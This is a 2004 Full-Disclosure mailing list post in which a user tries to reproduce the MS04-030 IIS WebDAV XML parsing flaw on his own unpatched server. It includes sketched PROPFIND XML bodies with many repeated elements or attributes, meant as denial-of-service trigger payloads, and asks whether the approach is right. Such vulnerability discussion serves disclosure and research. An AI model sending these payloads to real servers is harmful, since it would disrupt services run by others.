Re: [Full-Disclosure] MS04-030 WebDAV XML Parsing - Need Details

From: nirvana (karmic_nirvana_at_yahoo.com)
Date: 10/13/04

    To: full-disclosure@lists.netsys.com
    Date: Wed, 13 Oct 2004 10:51:59 -0700 (PDT)
    
    

    I tried attributes in a single tag too, like...

    <x:elem x:attr="value" x:attr="value" x:attr="value"
    x:attr="value" x:attr="value"...........so on />

    --- nirvana <karmic_nirvana@yahoo.com> wrote:

    > Hi List,
    > I've been trying to reproduce this vulnerability
    > (MS04-030) on my unpatched IIS. I am sending a
    > request with an element which has multiple/many attributes.
    > With my limited knowledge of WebDAV, I think the
    > attributes per-element can be sent in two ways:
    > 1. in one line, in the element tag only
    > 2. in multiple per attribute tags.
    >
    > The request I am sending is something like this (XML
    > Data only from a PROPFIND Request, with multiple
    > tags)...
    >
    > <?xml version="1.0" encoding="utf-8" ?>
    > <D:propfind xmlns:D="DAV:">
    > <D:prop xmlns:ns="DAV:"><ns:displayname/>
    > <ns:displayname>
    > <attrib1>a</attrib1>
    > <attrib1>a</attrib1>
    > .
    > .
    > .
    > .
    > <attrib1>a</attrib1>
    > </ns:displayname>
    > </D:prop>
    > </D:propfind>
    >
    >
    >
    > Please feel free to rant at me if I am doing it wrong :).
    >
    > Thanks.
    >
    >
    > _______________________________________________
    > Full-Disclosure - We believe in it.
    > Charter:
    > http://lists.netsys.com/full-disclosure-charter.html
    >


